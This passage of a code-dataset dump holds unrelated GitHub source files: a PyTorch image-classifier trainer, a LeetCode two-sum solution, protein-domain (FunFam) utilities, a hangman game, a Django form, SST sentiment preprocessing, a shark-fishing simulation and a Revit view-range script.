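# For torchvision classifiers the final child module is the fully-connected\r\n            # head, so [:-1] keeps the backbone together with its own pooling layer;\r\n            # the [:-2] branch below also drops the pooling layer so that the new\r\n            # AdaptiveConcatPool2d head can take its place.\r\n            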
body = nn.Sequential(*list(model.children())[:-1])\r\n        else:\r\n            body = nn.Sequential(*list(model.children())[:-2])\r\n        head = self.create_head(hidden, nc, bn_final, single_head)\r\n        \r\n        model = torch.nn.Sequential(body, head)\r\n        \r\n        # freeze the pretrained base of the model\r\n        self.freeze_all(model[0].parameters())\r\n        \r\n        # initialize the weights of the head\r\n        for child in model[1].children():\r\n            if isinstance(child, torch.nn.Module) and (not isinstance(child, self.bn_types)) and self.requires_grad(child): \r\n                init(child.weight)\r\n        \r\n        return model \r\n\r\n\r\n\r\nclass Trainer(object):\r\n    def __init__(self, option, steps_per_epoch):\r\n        self.option = option\r\n\r\n        self._build_model()\r\n        self._set_optimizer(steps_per_epoch)\r\n        self.logger = logger_setting(option.exp_name, option.save_dir, option.debug)\r\n\r\n    def _build_model(self):\r\n        if self.option.model == 'cnn':\r\n            self.net = model.convnet(num_classes=self.option.n_class)\r\n        elif self.option.model == 'resnet18':\r\n            if self.option.use_pretrain:\r\n                resnet = models.resnet18(pretrained = True)\r\n                resnet.eval()\r\n                ft = FinetuneModel()\r\n                self.net = ft.cnn_model(resnet, self.option.n_class, 1024, bn_final=True)\r\n            else:\r\n                self.net = models.resnet18(pretrained = False, num_classes=self.option.n_class)\r\n                # self.net = models.resnet18(pretrained = True)\r\n                # self.net.fc = nn.Linear(512, self.option.n_class)\r\n        \r\n        elif self.option.model == 'resnet101':\r\n            self.net = models.resnet101(pretrained = False, num_classes=self.option.n_class)\r\n\r\n\r\n        elif self.option.model == 'vgg19':\r\n            if self.option.use_pretrain:\r\n                vgg19 = models.vgg19(pretrained = True)\r\n                vgg19.eval()\r\n                ft = FinetuneModel()\r\n                self.net = ft.cnn_model(vgg19, self.option.n_class, 1024, bn_final=True)\r\n            else:\r\n                self.net = models.vgg19(pretrained = False, num_classes=self.option.n_class)\r\n        \r\n        elif self.option.model == 'mobilenet':\r\n            if self.option.use_pretrain:\r\n                mobilenet = models.mobilenet_v2(pretrained = True)\r\n                mobilenet.eval()\r\n                ft = FinetuneModel()\r\n                self.net = ft.cnn_model(mobilenet, self.option.n_class, 2560, bn_final=True, single_head=True)\r\n            else:\r\n                self.net = models.mobilenet_v2(pretrained = False, num_classes=self.option.n_class)\r\n\r\n        elif self.option.model == 'googlenet':\r\n            if self.option.use_pretrain:\r\n                googlenet = models.googlenet(pretrained = True)\r\n                googlenet.eval()\r\n                ft = FinetuneModel()\r\n                self.net = ft.cnn_model(googlenet, self.option.n_class, 2048, bn_final=True)\r\n            else:\r\n                self.net = models.googlenet(pretrained = False, num_classes=self.option.n_class)\r\n\r\n        elif self.option.model == 'alexnet':\r\n            if self.option.use_pretrain:\r\n                alexnet = models.alexnet(pretrained = True)\r\n                alexnet.eval()\r\n                ft = FinetuneModel()\r\n                self.net = ft.cnn_model(alexnet, self.option.n_class, 512, bn_final=True)\r\n            else:\r\n                self.net = models.alexnet(pretrained = False, num_classes=self.option.n_class)\r\n        \r\n        elif self.option.model == 'vgg19_baf':\r\n            from model_baf_vgg19 import vgg19 as vgg19_baf\r\n\r\n            if self.option.use_pretrain:\r\n                vgg19_baf = vgg19_baf(pretrained = True)\r\n                vgg19_baf.eval()\r\n                ft = FinetuneModel()\r\n                self.net = ft.cnn_model(vgg19_baf, self.option.n_class, 512, bn_final=True)\r\n            else:\r\n                self.net = vgg19_baf(pretrained = False, num_classes=self.option.n_class)\r\n\r\n        self.loss = nn.CrossEntropyLoss(ignore_index=255)\r\n\r\n        if self.option.cuda:\r\n            self.net.cuda()\r\n            self.loss.cuda()\r\n\r\n\r\n    def _set_optimizer(self, steps):\r\n        # self.optim = optim.SGD(filter(lambda p: 
p.requires_grad, self.net.parameters()), lr=self.option.lr, momentum=self.option.momentum, weight_decay=self.option.weight_decay)\r\n        # self.optim = optim.Adam(filter(lambda p: p.requires_grad, self.net.parameters()), lr=self.option.lr, weight_decay=self.option.weight_decay)\r\n        \r\n        self.optim = optim.Adam(self.net.parameters(), lr=self.option.lr, weight_decay=self.option.weight_decay)\r\n        lr_lambda = lambda step: self.option.lr_decay_rate ** (step // self.option.lr_decay_period)\r\n        self.scheduler = optim.lr_scheduler.LambdaLR(self.optim, lr_lambda=lr_lambda, last_epoch=-1)\r\n        \r\n        # self.optim = optim.Adam(self.net.parameters(), lr=1e-7, weight_decay=1e-5)\r\n        # self.scheduler = torch.optim.lr_scheduler.OneCycleLR(self.optim, max_lr=5e-2, pct_start=0.3, steps_per_epoch=steps, epochs=self.option.max_step)\r\n        \r\n        if self.option.use_pretrain:\r\n            self.optim = optim.Adam(self.net.parameters(), lr=1e-7, weight_decay=1e-5)\r\n            self.scheduler = torch.optim.lr_scheduler.OneCycleLR(self.optim, max_lr=5e-2, pct_start=0.3, steps_per_epoch=steps, epochs=self.option.max_step)\r\n\r\n\r\n    @staticmethod\r\n    def _weights_init_xavier(m):\r\n        classname = m.__class__.__name__\r\n        if classname == 'BasicConv2d' or classname == 'ConvBNReLU':\r\n            pass\r\n        elif classname.find('Conv') != -1:\r\n            nn.init.xavier_normal_(m.weight.data, gain=1.0)\r\n        elif classname.find('Linear') != -1:\r\n            nn.init.xavier_normal_(m.weight.data, gain=1.0) \r\n\r\n    def _initialization(self):\r\n        self.net.apply(self._weights_init_xavier)\r\n\r\n        if self.option.is_train and self.option.use_pretrain:\r\n            if self.option.checkpoint is not None:\r\n                self._load_model()\r\n            else:\r\n                print(\"no pretrained model\")\r\n\r\n\r\n    def _mode_setting(self, is_train=True):\r\n        if is_train:\r\n            self.net.train()\r\n        else:\r\n            self.net.eval()\r\n\r\n\r\n    def _train_step(self, data_loader, step):\r\n        loss_sum = 0.\r\n        total_num_correct = 0.\r\n        total_num_test = 0.\r\n        for i, (images,labels) in enumerate(tqdm(data_loader)):\r\n            images = self._get_variable(images)\r\n            labels = self._get_variable(labels)\r\n            pred_label = self.net(images)\r\n\r\n            total_num_correct += self._num_correct(pred_label,labels,topk=1).data\r\n            batch_size = images.shape[0]\r\n            total_num_test += batch_size\r\n\r\n            loss = self.loss(pred_label, torch.squeeze(labels))\r\n            loss_sum += loss\r\n            self.optim.zero_grad()\r\n            loss.backward()\r\n            self.optim.step()\r\n        avg_acc = total_num_correct/total_num_test\r\n        msg = f\"[TRAIN] LOSS {loss_sum/len(data_loader)}, ACCURACY : {avg_acc}\"\r\n\r\n        self.logger.info(msg)\r\n\r\n\r\n    def _validate(self, data_loader, step=0):\r\n        self._mode_setting(is_train=False)\r\n\r\n        if not self.option.is_train:\r\n            print('not in training process')\r\n            self._initialization()\r\n            if self.option.checkpoint is not None:\r\n                self._load_model()\r\n            else:\r\n                print(\"No trained model\")\r\n                sys.exit()\r\n        num_test = 10000\r\n\r\n        total_num_correct = 0.\r\n        total_num_test = 0.\r\n        total_loss = 0.\r\n        with torch.no_grad():\r\n            for i, (images,labels) in enumerate(tqdm(data_loader)):\r\n                \r\n                images = self._get_variable(images)\r\n                labels = self._get_variable(labels)\r\n\r\n                # self.optim.zero_grad()\r\n                pred_label = self.net(images)\r\n\r\n                loss = self.loss(pred_label, torch.squeeze(labels))\r\n                \r\n                batch_size = images.shape[0]\r\n                total_num_correct += self._num_correct(pred_label,labels,topk=1).data\r\n                total_loss += loss.data*batch_size\r\n                total_num_test += batch_size\r\n        \r\n        avg_loss = total_loss/total_num_test\r\n        avg_acc = total_num_correct/total_num_test\r\n        msg = f\"[EVALUATION] step 
{step}, LOSS {avg_loss}, ACCURACY : {avg_acc}\"\r\n self.logger.info(msg)\r\n\r\n\r\n def _num_correct(self,outputs,labels,topk=1):\r\n _, preds = outputs.topk(k=topk, dim=1)\r\n preds = preds.t()\r\n correct = preds.eq(labels.view(1, -1).expand_as(preds))\r\n correct = correct.view(-1).sum()\r\n return correct\r\n\r\n\r\n def _accuracy(self, outputs, labels):\r\n batch_size = labels.size(0)\r\n _, preds = outputs.topk(k=1, dim=1)\r\n preds = preds.t()\r\n correct = preds.eq(labels.view(1, -1).expand_as(preds))\r\n correct = correct.view(-1).float().sum(0, keepdim=True)\r\n accuracy = correct.mul_(100.0 / batch_size)\r\n return accuracy\r\n\r\n\r\n def _save_model(self, step):\r\n torch.save({\r\n 'step': step,\r\n 'optim_state_dict': self.optim.state_dict(),\r\n 'net_state_dict': self.net.state_dict()\r\n }, os.path.join(self.option.save_dir,self.option.exp_name, f'checkpoint_step_{step}.pth'))\r\n print('checkpoint saved. step : %d'%step)\r\n\r\n\r\n def _load_model(self):\r\n ckpt = torch.load(self.option.checkpoint)\r\n self.net.load_state_dict(ckpt['net_state_dict'])\r\n self.optim.load_state_dict(ckpt['optim_state_dict'])\r\n\r\n\r\n def train(self, train_loader, val_loader=None):\r\n if not self.option.use_pretrain:\r\n self._initialization()\r\n if self.option.checkpoint is not None:\r\n self._load_model()\r\n\r\n start_epoch = 0\r\n for step in range(start_epoch, self.option.max_step):\r\n self._mode_setting(is_train=True)\r\n\r\n if self.option.train_baseline:\r\n self._train_step_baseline(train_loader, step)\r\n else:\r\n self._train_step(train_loader,step)\r\n self.scheduler.step()\r\n\r\n if step == 1 or step % self.option.save_step == 0 or step == (self.option.max_step-1):\r\n if val_loader is not None:\r\n self._validate(val_loader, step)\r\n self._save_model(step)\r\n\r\n\r\n def _get_variable(self, inputs):\r\n if self.option.cuda:\r\n return Variable(inputs.cuda())\r\n return Variable(inputs)\r\n\r\nif __name__ == '__main__': main()\r\n","repo_name":"dkdkkim/biases-are-features","sub_path":"DK/trainer_dk.py","file_name":"trainer_dk.py","file_ext":"py","file_size_in_byte":13580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"10738523526","text":"# @before-stub-for-debug-begin\nfrom python3problem1 import *\nfrom typing import *\n# @before-stub-for-debug-end\n\n#\n# @lc app=leetcode.cn id=1 lang=python3\n#\n# [1] 两数之和\n#\n\n# @lc code=start\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n\n Hashable = dict()\n for id, num in enumerate(nums):\n res = target - num\n if res in Hashable:\n return [Hashable[res], id]\n else:\n Hashable[num] = id\n return []\n\n# @lc code=end\n\n","repo_name":"MaxZN/Leetcode","sub_path":"1.两数之和.py","file_name":"1.两数之和.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3531268397","text":"\"\"\"\nclass that represents FunFam entries\n\"\"\"\n\n\nclass FunFamEntry(object):\n\n def __init__(self, id, funfam, superfamily, start, end, uniprot_ids, ec_ids, sequence, sequence_aligned_by_funfam):\n self.id = id\n self.funfam = funfam\n self.superfamily = superfamily\n self.start = start\n self.end = end\n self.uniprot_ids = uniprot_ids\n self.ec_ids = ec_ids\n self.sequence = sequence\n self.aligned_sequence_funfam = sequence_aligned_by_funfam\n self.sites = []\n\n def __str__(self):\n return (self.id + \";\\t\" + str(self.uniprot_ids) + \";\\t\" + str(\n self.ec_ids) 
+ \";\\t\" + self.funfam + \";\\t\" + self.superfamily + \";\\t\" + str(self.start) + \";\\t\" + str(\n self.end) + \";\\n\" + str(self.aligned_sequence_funfam) + \";\\n\" + str(self.sites) + \";\\n\" + str(\n self.mapped_sites_funfam))\n\n def __eq__(self, other):\n \"\"\"\n checks if two funfam_entry objects represent the same domain sequence\n :param other: funfam_entry\n :return: boolean\n \"\"\"\n return self.superfamily == other.superfamily and self.funfam == other.funfam and self.id == other.id\n\n def __hash__(self):\n return hash((self.id, self.superfamily, self.funfam, self.start, self.end))\n\n def add_binding_sites(self, uniprot_binding_site_mapping):\n for uniprot_id in self.uniprot_ids:\n self.sites.append(uniprot_binding_site_mapping.get(uniprot_id))\n\n def process_sites(self):\n i = 0\n index = -1\n relevant_sites = None\n for binding_sites in self.sites:\n index += 1\n if binding_sites is None:\n continue\n if not binding_sites:\n continue\n i += 1\n relevant_sites = binding_sites\n\n if i > 1:\n print(\"ambiguity processing sites:\", self.id, self.funfam, self.superfamily)\n # print(self.sites)\n # raise ValueError(\"multiple binding site annotations for entry\")\n return (False)\n if relevant_sites is None:\n self.sites = None\n else:\n self.sites = [site for site in relevant_sites if (site >= self.start and site <= self.end)]\n self.binding_site_id = self.uniprot_ids[index]\n\n return (True)\n\n def write_info(self, group):\n print(self.id, self.funfam, self.superfamily, self.start, self.end, self.binding_site_id)\n print(\"uniprot ids:\", self.uniprot_ids)\n print(\"binding sites\", self.sites)\n if group == \"ec\":\n print(\"mapped sites ec:\", self.mapped_sites_ec)\n elif group == \"funfam\":\n print(\"mapped sites funfam:\", self.mapped_sites_funfam)\n print(\"ec numbers:\", self.ec_ids)\n\n def map_binding_sites(self, group):\n '''maps binding sites from the sequence to the ec alignment level'''\n if group == \"funfam\":# or group in ['funfam-on-ec-subset', 'funfam-on-pfam-subset', 'funfam-on-prosite-subset', 'pfam-on-subset']:\n sequence = self.aligned_sequence_funfam\n elif group == \"ec\":\n sequence = self.aligned_sequence_ec\n elif group == \"pfam\":\n sequence = self.aligned_sequence_pfam\n elif group == \"prosite\":\n sequence = self.aligned_sequence_prosite\n else:\n raise ValueError(\"group has to be funfam or ec\")\n\n out = []\n for bs in self.sites:\n gaps = 0\n counter = self.start - 1\n for aa in sequence:\n if aa == '-':\n gaps = gaps + 1\n else:\n counter = counter + 1\n if counter == bs:\n break\n out.append(bs + gaps - self.start + 1)\n\n if group == \"funfam\":# or group in ['funfam-on-ec-subset', 'funfam-on-pfam-subset', 'funfam-on-prosite-subset']:\n self.mapped_sites_funfam = out\n elif group == \"ec\":\n self.mapped_sites_ec = out\n elif group == \"pfam\":\n self.mapped_sites_pfam = out\n elif group == \"prosite\":\n self.mapped_sites_prosite = out\n","repo_name":"Rostlab/FunFamsConsensus","sub_path":"code_similarity/funfam_entry.py","file_name":"funfam_entry.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36403829490","text":"import random\n\nword_list = [\"python\", \"asmr\", \"computer\", \"programming\", \"coding\", \"tutorial\"]\n\n\ndef selected_word():\n word = random.choice(word_list)\n return word.upper()\n\ndef play(word):\n # Create a list of underscores to represent the unknown letters of the word\n word_completion = \"_\" 
* len(word)\n guessed = False\n guessed_letters = []\n guessed_words = []\n tries = 6\n\n print(\"Let's play Hangman!\")\n print(display_hangman(tries))\n print(word_completion+\"\\n\")\n\n while not guessed and tries > 0:\n guess = input(\"Please guess a letter or word: \").upper()\n if len(guess) == 1 and guess.isalpha():\n # If user guesses a letter\n if guess in guessed_letters:\n print(\"You already guessed the letter\", guess)\n elif guess not in word:\n print(guess, \"is not in the word.\")\n tries -= 1\n guessed_letters.append(guess)\n else: \n print(\"Good job!\", guess, \"is in the word\")\n guessed_letters.append(guess)\n # Add guess to word_completion instead of _\n word_as_list = list(word_completion)\n indices = [i for i, letter in enumerate(word) if letter == guess]\n for index in indices:\n word_as_list[index] = guess\n word_completion = \"\".join(word_as_list)\n if \"_\" not in word_completion:\n guessed = True\n elif len(guess) == len(word) and guess.isalpha():\n # If user guesses a word\n if guess in guessed_words:\n print(\"You already guessed this word\")\n elif guess != word:\n print(guess, \"is not the word.\")\n tries -= 1\n guessed_words.append(guess)\n else:\n guessed = True\n word_completion = word\n else:\n print(\"Not a valid guess.\")\n print(display_hangman(tries))\n print(word_completion, \"\\n\")\n\n if guessed: \n print(\"Congratulations, you guessed the word!\")\n else:\n print(\"Sorry, you ran out of tries. The word was\", word, \".\")\n \n\ndef display_hangman(tries):\n stages = [\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | / \\\\\n -\n \"\"\",\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | / \n -\n \"\"\",\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | \n -\n \"\"\",\n \"\"\"\n --------\n | |\n | O\n | \\\\|\n | |\n | \n -\n \"\"\",\n \"\"\"\n --------\n | |\n | O\n | |\n | |\n | \n -\n \"\"\",\n \"\"\"\n --------\n | |\n | O\n | \n | \n | \n -\n \"\"\",\n \"\"\"\n --------\n | |\n | \n | \n | \n | \n -\n \"\"\",\n\n ]\n return stages[tries]\n\n\nword = selected_word()\nplay(word)\n","repo_name":"ANPetru/HangmainInPython","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33689369491","text":"from django import forms\n\nfrom apps.participant.models import Participant\n\n\nclass ParticipateForm(forms.ModelForm):\n\n class Meta:\n model = Participant\n fields = (\n 'is_first_time',\n 'category_id',\n 'organization_type',\n 'organization_location',\n 'organization_name',\n 'organization_number_of_employees',\n 'contact_person_name',\n 'contact_person_number',\n 'contact_person_email',\n 'secondary_contact_person_name',\n 'secondary_contact_person_number',\n 'secondary_contact_person_email',\n 'membership_certificate',\n 'trade_license'\n )\n","repo_name":"Shahkhan-web/django_shjseen","sub_path":"apps/website/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27566469411","text":"from os.path import join as pjoin\nfrom src.utils.file import save_file\n\nclass SSTPreprocess():\n def __init__(self, data_dir, label_class):\n self.label_class = label_class\n self.data_dir = data_dir\n self.trees, self.dictionary, self.sentiment_labels, self.dataset_split = self.load_sst_data(data_dir)\n self.samples = self.generate_samples()\n self.save_preprocess_file()\n\n # 
internal use\n def load_sst_data(self, data_dir):\n # dictionary\n dictionary = {}\n with open(pjoin(data_dir, 'dictionary.txt'), encoding='utf-8') as file:\n for line in file:\n line = line.strip().split('|')\n assert len(line) == 2\n dictionary[line[0]] = int(line[1])\n\n # sentiment_labels\n sentiment_labels = {}\n with open(pjoin(data_dir, 'sentiment_labels.txt'), encoding='utf-8') as file:\n file.readline() # for table head\n for line in file:\n line = line.strip().split('|')\n sent_float_value = float(line[1])\n\n sentiment_labels[int(line[0])] = sent_float_value\n\n # STree.txt and SOStr.txt\n trees = []\n with open(pjoin(data_dir, 'STree.txt'), encoding='utf-8') as file_STree, \\\n open(pjoin(data_dir, 'SOStr.txt'), encoding='utf-8') as file_SOStr:\n for STree, SOStr in zip(file_STree, file_SOStr):\n sent_tree = []\n STree = list(map(int, STree.strip().split('|')))\n SOStr = SOStr.strip().split('|')\n\n for idx_t, parent_idx in enumerate(STree):\n try:\n token = SOStr[idx_t]\n is_leaf = True\n leaf_node_index_seq = [idx_t+1]\n except IndexError:\n token = ''\n is_leaf = False\n leaf_node_index_seq = []\n\n new_node = {'node_index': idx_t+1, 'parent_index': parent_idx,\n 'token': token, 'is_leaf': is_leaf,\n 'leaf_node_index_seq': leaf_node_index_seq, }\n sent_tree.append(new_node)\n\n # update leaf_node_index_seq\n idx_to_node_dict = dict((tree_node['node_index'], tree_node)\n for tree_node in sent_tree)\n for tree_node in sent_tree:\n if not tree_node['is_leaf']: break\n pre_node = tree_node\n while pre_node['parent_index'] > 0:\n cur_node = idx_to_node_dict[pre_node['parent_index']]\n cur_node['leaf_node_index_seq'] += pre_node['leaf_node_index_seq']\n cur_node['leaf_node_index_seq'] = list(\n sorted(list(set(cur_node['leaf_node_index_seq']))))\n pre_node = cur_node\n\n # update sentiment and add token_seq\n for tree_node in sent_tree:\n tokens = [sent_tree[node_idx-1]['token'] for node_idx in tree_node['leaf_node_index_seq']]\n phrase = ' '.join(tokens)\n tree_node['sentiment_label'] = sentiment_labels[dictionary[phrase]]\n tree_node['token_seq'] = tokens\n\n trees.append(sent_tree)\n\n # dataset_split (head)\n dataset_split = []\n with open(pjoin(data_dir, 'datasetSplit.txt'), encoding='utf-8') as file:\n file.readline() # for table head\n for line in file:\n dataset_split.append(int(line.strip().split(',')[1]))\n\n return trees, dictionary, sentiment_labels, dataset_split\n\n def generate_samples(self):\n samples = []\n for _type, tree in zip(self.dataset_split, self.trees):\n for tree_node in tree:\n if tree_node['parent_index'] == 0:\n sample = tree_node.copy()\n break\n sample['data_type'] = _type\n sample['sentence_token'] = sample['token_seq'].copy()\n sample.pop('node_index')\n sample.pop('parent_index')\n sample.pop('token')\n sample.pop('leaf_node_index_seq')\n sample.pop('token_seq')\n sample.pop('is_leaf')\n samples.append(sample)\n\n # sentiment label fix to class\n fixed_samples = []\n if self.label_class == 2:\n for sample in samples:\n sentiment_label = sample['sentiment_label']\n if sentiment_label> 0.4 and sentiment_label <= 0.6:\n continue\n if sentiment_label < 0.5:\n sample['sentiment_int'] = 0\n else:\n sample['sentiment_int'] = 1\n fixed_samples.append(sample)\n else:\n # 5 class\n for sample in samples:\n sentiment_label = sample['sentiment_label']\n if sentiment_label <= 0.2:\n sentiment_int = 0\n elif sentiment_label <= 0.4:\n sentiment_int = 1\n elif sentiment_label <= 0.6:\n sentiment_int = 2\n elif sentiment_label <= 0.8:\n sentiment_int = 3\n 
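# labels above 0.8 fall into the most positive bucket below; together the five\n                # buckets follow the usual SST-5 thresholds 0.2/0.4/0.6/0.8\n                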
else:\n                    sentiment_int = 4\n                sample['sentiment_int'] = sentiment_int\n                fixed_samples.append(sample)\n        return fixed_samples\n\n    def save_preprocess_file(self):\n        train_samples = []\n        dev_samples = []\n        test_samples = []\n        for sample in self.samples:\n            if sample['data_type'] == 1:\n                train_samples.append(sample)\n            elif sample['data_type'] == 2:\n                dev_samples.append(sample)\n            else:\n                test_samples.append(sample)\n\n        save_file(train_samples, pjoin(self.data_dir, 'train.json'), mode = 'json')\n        save_file(dev_samples, pjoin(self.data_dir, 'dev.json'), mode = 'json')\n        save_file(test_samples, pjoin(self.data_dir, 'test.json'), mode = 'json')\n\nsst_preprocess = SSTPreprocess(data_dir='/home/cike/zhangxing/Code/sentiment-classification-1/dataset/sst',\n                               label_class=2)\nsamples = sst_preprocess.samples\n# print('done')\n\n\n","repo_name":"superzhangxing/sentiment-classification-1","sub_path":"src/preprocess/sst_preprocess.py","file_name":"sst_preprocess.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"17650031893","text":"import os\n\nimport cv2\nfrom tqdm import tqdm\n\npath = \"/code/data/datasets/common_hall/demo_imgs_upload\"\n\nimg_list = os.listdir(path)\n\nfor i in tqdm(img_list):\n    img_path = os.path.join(path, i)\n    img = cv2.imread(img_path)\n    img = cv2.rectangle(img, (450, 200), (1280, 720), (0, 255, 0), thickness=4)\n    cv2.imwrite(img_path, img)\n","repo_name":"sparrowml/Speed-Trap-2022","sub_path":"speed_trapv3/utilityPyScripts/draw_rect.py","file_name":"draw_rect.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"2227005580","text":"import sys\nsys.stdin = open(\"낚시왕.txt\", \"r\")\n\n\ndef getData():\n    r, c, m = map(int, input().split())\n    arr = [list(map(int, input().split())) for _ in range(m)]\n    return r, c, m, arr\n\ndef printGrid(r, c, m, arr):\n    print(\"R: {}, C: {}, M: {}\".format(r, c, m))\n    for i in range(m):\n        print(*arr[i])\n\n\n# dictionaries: cell position -> shark data / largest shark size per cell\n\ndef initialize(r, c, m, arr):\n    global loc, size\n    for i in range(m):\n        row = arr[i][0]\n        col = arr[i][1]\n        speed = arr[i][2]\n        dir = arr[i][3]  # 1: up, 2: down, 3: right, 4: left\n        size = arr[i][4]\n\n        # compare sizes\n        if ((col, row) not in sizes):\n            sizes[(col, row)] = size\n            if col not in loc:\n                loc[col] = {}\n            loc[col][row] = arr[i]\n        else:\n            sizes[(col, row)] = max(sizes[(col, row)], size)\n            if size == sizes[(col, row)]:\n                loc[col][row] = arr[i]\n\n\n\ndef printSharks(loc, sizes):\n    for col in loc:\n        for row in loc[col]:\n            print(\"({}, {})\".format(row, col))\n            print(loc[col][row])\n            print(sizes[(col, row)])\n\n\n\ndef catchShark(loc, sizes):\n    global curr, ans\n    #print(sorted(loc[curr]))\n    if curr in loc:\n        catchCol = curr\n        catchRow = sorted(loc[curr])[0]\n        ans += sizes[(catchCol, catchRow)]\n        sizes.pop((catchCol, catchRow))\n        loc[catchCol].pop(catchRow)\n\n\ndef moveShark(loc, sizes):\n    newLoc = {}\n    newSizes = {}\n\n    for cc in loc:\n        for rr in loc[cc]:\n            row = loc[cc][rr][0]\n            col = loc[cc][rr][1]\n            speed = loc[cc][rr][2]\n            dir = loc[cc][rr][3]  # 1: up, 2: down, 3: right, 4: left\n            size = loc[cc][rr][4]\n\n\n            ## MOVE SEQUENCE ##\n            if (dir == 1 or dir == 2):\n                speed = speed % ((r - 1) * 2)\n                for i in range(speed):\n                    if (dir == 1):\n                        row -= 1\n                        if (row < 1):\n                            dir = 2\n                            row = row + 2\n                    elif (dir == 2):\n                        row += 1\n                        if (row > r):\n                            dir = 1\n                            row = row - 2\n                    #print(dir, row, col, i, speed)\n\n\n            else:\n                speed = speed % ((c - 1) * 2)\n                
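# horizontal movement: a full left-right round trip takes 2*(c - 1) steps, so\n                # the speed is first reduced modulo that period (e.g. with c == 6, a speed\n                # of 13 becomes 13 % 10 == 3 effective steps) before simulating step by step\n                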
for i in range(speed):\n if (dir == 4):\n col -= 1\n if (col < 1):\n dir = 3\n col = col + 2\n elif (dir == 3):\n col += 1\n if (col > c):\n dir = 4\n col = col - 2\n\n\n\n loc[cc][rr][0] = row\n loc[cc][rr][1] = col\n loc[cc][rr][3] = dir\n\n if (col, row) in newSizes:\n newSizes[(col, row)] = max(newSizes[(col, row)], size)\n if newSizes[(col, row)] == size:\n newLoc[col][row] = loc[cc][rr]\n\n else:\n newSizes[(col, row)] = size\n if col not in newLoc:\n newLoc[col] = {}\n newLoc[col][row] = loc[cc][rr]\n\n return newLoc, newSizes\n\n\n\n\n\n\n\n\n\n\n\n\nr, c, m, arr = getData()\nloc = {}\nsizes = {}\nans = 0\n#printGrid(r, c, m, arr)\ninitialize(r, c, m, arr)\n\n\nfor curr in range(1, c + 1):\n catchShark(loc, sizes)\n loc, sizes = moveShark(loc, sizes)\n #printSharks(loc, sizes)\n #print(\"### {}\".format(ans))\n\nprint(ans)","repo_name":"howon-kim/alg","sub_path":"23상반기/코드트리/낚시왕.py","file_name":"낚시왕.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11126386375","text":"# histogram\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\n\n\nclass Hist:\n\n def __init__(self):\n self.fig, self.ax = plt.subplots()\n self.fig.set_size_inches(6, 2)\n self.ax.set_title('Histogram (grayscale)')\n self.ax.set_xlabel('Bin')\n self.ax.set_ylabel('Frequency')\n self.lw = 3\n self.alpha = 0.5\n self.bins = 16\n self.lineGray, = self.ax.plot(\n np.arange(self.bins), np.zeros((self.bins, 1)), c='k', lw=self.lw)\n self.ax.set_xlim(0, self.bins - 1)\n self.ax.set_ylim(0, 1)\n self.old = None\n plt.rcParams[\"figure.figsize\"] = (1, 1)\n plt.ion()\n plt.show()\n\n def draw(self, gray):\n # hist\n numPixels = np.prod(gray.shape[:2])\n histogram = cv2.calcHist(\n [gray], [0], None, [self.bins], [0, 255]) / numPixels\n if self.old is not None:\n self.chi2_distance(self.old, histogram)\n self.old = histogram\n self.lineGray.set_ydata(histogram)\n self.fig.canvas.draw()\n\n def chi2_distance(self, histA, histB, eps=1e-10):\n # compute the chi-squared distance\n d = 0.5 * np.sum([((a - b) ** 2) / (a + b + eps)\n for (a, b) in zip(histA, histB)])\n # return the chi-squared distance\n return d\n","repo_name":"mhtocs/quickmaths_git","sub_path":"quickmaths/utils/hist.py","file_name":"hist.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"982797365","text":"# coding: utf8\n\nfrom Autodesk.Revit.DB import Document, ViewPlan\n\nfrom pyrevit import forms, script, revit\n\n__doc__ = \"\"\"Copy view range from source views to target views.\nIf only 1 source view is selected same view range is applied to all views\"\"\"\n__title__ = \"ViewRange\"\n__author__ = \"Cyril Waechter\"\n\ndoc = revit.doc # type:Document\nlogger = script.get_logger()\n\n\ndef copy_view_range():\n \"\"\"Copy view range from source views to target views\"\"\"\n prompt_text = \"Select one or multiple source views\"\n with forms.WarningBar(title=prompt_text):\n source_list = forms.select_views(\n title=prompt_text, filterfunc=lambda x: isinstance(x, ViewPlan)\n )\n\n if not source_list:\n return False\n\n prompt_text = \"Select target views\"\n with forms.WarningBar(title=prompt_text):\n target_list = forms.select_views(\n title=prompt_text, filterfunc=lambda x: isinstance(x, ViewPlan)\n )\n\n if not target_list:\n return True\n\n with revit.Transaction(\"Copy view range\", doc):\n logger.info(\"VIEW RANGE applied from 
